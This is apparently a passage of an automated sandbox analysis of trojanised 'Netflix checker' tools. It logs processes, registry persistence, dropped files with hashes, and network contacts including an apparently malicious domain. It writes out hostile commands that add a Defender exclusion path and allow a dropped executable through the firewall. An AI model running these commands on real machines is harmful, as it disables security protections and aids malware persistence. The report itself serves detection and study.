C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
C:\Windows\winconfig.exe
"C:\Windows\winconfig.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\winconfig.exe" "winconfig.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.132.60.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hccr.sytes.net | udp |
Files
memory/400-133-0x0000000000AF0000-0x0000000000B26000-memory.dmp
memory/400-134-0x00000000054B0000-0x000000000554C000-memory.dmp
memory/400-135-0x0000000005B50000-0x00000000060F4000-memory.dmp
memory/400-136-0x0000000005640000-0x00000000056D2000-memory.dmp
memory/400-137-0x0000000005550000-0x000000000555A000-memory.dmp
memory/400-138-0x0000000005870000-0x0000000005880000-memory.dmp
memory/400-139-0x00000000056E0000-0x0000000005736000-memory.dmp
memory/1760-140-0x0000000000760000-0x0000000000774000-memory.dmp
memory/1760-141-0x0000000006690000-0x000000000670E000-memory.dmp
memory/1760-142-0x0000000005010000-0x0000000005020000-memory.dmp
memory/548-144-0x0000000000C30000-0x0000000000CA0000-memory.dmp
memory/4576-145-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
memory/4576-146-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/4576-147-0x0000000005720000-0x0000000005742000-memory.dmp
memory/4576-148-0x0000000005F40000-0x0000000005FA6000-memory.dmp
memory/4576-149-0x0000000005FB0000-0x0000000006016000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x22w14w2.gb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/548-155-0x0000000005830000-0x0000000005840000-memory.dmp
memory/4576-161-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/1760-160-0x0000000005010000-0x0000000005020000-memory.dmp
memory/4576-162-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/4576-163-0x00000000065E0000-0x00000000065FE000-memory.dmp
memory/548-166-0x0000000005830000-0x0000000005840000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1760-186-0x0000000006350000-0x00000000063C6000-memory.dmp
memory/4576-187-0x0000000002CF0000-0x0000000002D00000-memory.dmp
memory/1760-188-0x0000000006330000-0x000000000634E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4860-203-0x0000000000080000-0x0000000000092000-memory.dmp
memory/4576-204-0x00000000077A0000-0x00000000077D2000-memory.dmp
memory/4576-205-0x000000006F4B0000-0x000000006F4FC000-memory.dmp
memory/4576-215-0x0000000006BA0000-0x0000000006BBE000-memory.dmp
memory/4576-216-0x000000007FAD0000-0x000000007FAE0000-memory.dmp
memory/4860-217-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/4576-218-0x0000000007F40000-0x00000000085BA000-memory.dmp
memory/4576-219-0x00000000078F0000-0x000000000790A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4576-223-0x0000000007960000-0x000000000796A000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/1652-224-0x0000000000DE0000-0x0000000000DF2000-memory.dmp
memory/4576-228-0x0000000007B70000-0x0000000007C06000-memory.dmp
memory/1652-229-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4576-230-0x0000000007B20000-0x0000000007B2E000-memory.dmp
memory/4576-231-0x0000000007C30000-0x0000000007C4A000-memory.dmp
memory/4576-232-0x0000000007C10000-0x0000000007C18000-memory.dmp
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
memory/1392-247-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/1392-248-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/4860-249-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/1652-251-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/1392-252-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/1392-253-0x00000000054D0000-0x00000000054E0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
22s
Max time network
30s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe"
Network
Files
memory/1012-133-0x0000000000C00000-0x0000000000C1E000-memory.dmp
memory/1012-134-0x00000000013A0000-0x00000000013BE000-memory.dmp
memory/1012-135-0x000000001B940000-0x000000001B950000-memory.dmp
memory/1012-136-0x0000000001400000-0x000000000143E000-memory.dmp
memory/1012-137-0x000000001B940000-0x000000001B950000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
42s
Max time network
48s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| IE | 20.190.159.68:443 | | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3212-133-0x0000000000400000-0x0000000000671000-memory.dmp
memory/3212-135-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-136-0x0000000002B10000-0x0000000002BAC000-memory.dmp
memory/3212-137-0x0000000004F40000-0x0000000004FD2000-memory.dmp
memory/3212-138-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-139-0x00000000050D0000-0x00000000050E0000-memory.dmp
memory/3212-140-0x0000000000400000-0x0000000000671000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
47s
Max time network
54s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 13.89.178.26:443 | N/A | tcp |
Files
memory/4272-133-0x0000000000100000-0x0000000000114000-memory.dmp
memory/4272-134-0x0000000004F10000-0x00000000054B4000-memory.dmp
memory/4272-135-0x0000000004A00000-0x0000000004A92000-memory.dmp
memory/4272-136-0x00000000049C0000-0x00000000049CA000-memory.dmp
memory/4272-137-0x0000000006030000-0x00000000060AE000-memory.dmp
memory/4272-138-0x0000000004950000-0x0000000004960000-memory.dmp
memory/4272-139-0x0000000004950000-0x0000000004960000-memory.dmp
memory/2840-140-0x00000000022D0000-0x0000000002306000-memory.dmp
memory/2840-141-0x0000000004EB0000-0x00000000054D8000-memory.dmp
memory/2840-142-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-143-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-144-0x0000000004D40000-0x0000000004D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lw1m3241.w3c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2840-150-0x00000000054E0000-0x0000000005546000-memory.dmp
memory/2840-152-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/2840-156-0x0000000005BF0000-0x0000000005C0E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4272-178-0x0000000005C90000-0x0000000005D06000-memory.dmp
memory/4272-179-0x0000000005C70000-0x0000000005C8E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2752-194-0x00000000005A0000-0x00000000005B2000-memory.dmp
memory/2840-195-0x00000000061D0000-0x0000000006202000-memory.dmp
memory/2840-197-0x000000007FD00000-0x000000007FD10000-memory.dmp
memory/2840-199-0x0000000004870000-0x0000000004880000-memory.dmp
memory/2840-198-0x000000006F560000-0x000000006F5AC000-memory.dmp
memory/2840-209-0x00000000061B0000-0x00000000061CE000-memory.dmp
memory/2752-196-0x0000000004F20000-0x0000000004F30000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2840-214-0x0000000006F10000-0x0000000006F2A000-memory.dmp
memory/2840-213-0x0000000007550000-0x0000000007BCA000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4344-216-0x0000000000A40000-0x0000000000A52000-memory.dmp
memory/4344-217-0x0000000005310000-0x0000000005320000-memory.dmp
memory/2840-220-0x0000000006F90000-0x0000000006F9A000-memory.dmp
memory/2840-221-0x00000000071A0000-0x0000000007236000-memory.dmp
memory/2840-222-0x0000000007150000-0x000000000715E000-memory.dmp
memory/2840-223-0x0000000007260000-0x000000000727A000-memory.dmp
memory/2840-224-0x0000000007240000-0x0000000007248000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
34s
Max time network
27s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/1228-133-0x0000000000740000-0x0000000000774000-memory.dmp
memory/1228-134-0x0000000005190000-0x000000000522C000-memory.dmp
memory/1228-135-0x00000000057E0000-0x0000000005D84000-memory.dmp
memory/1228-136-0x0000000005230000-0x00000000052C2000-memory.dmp
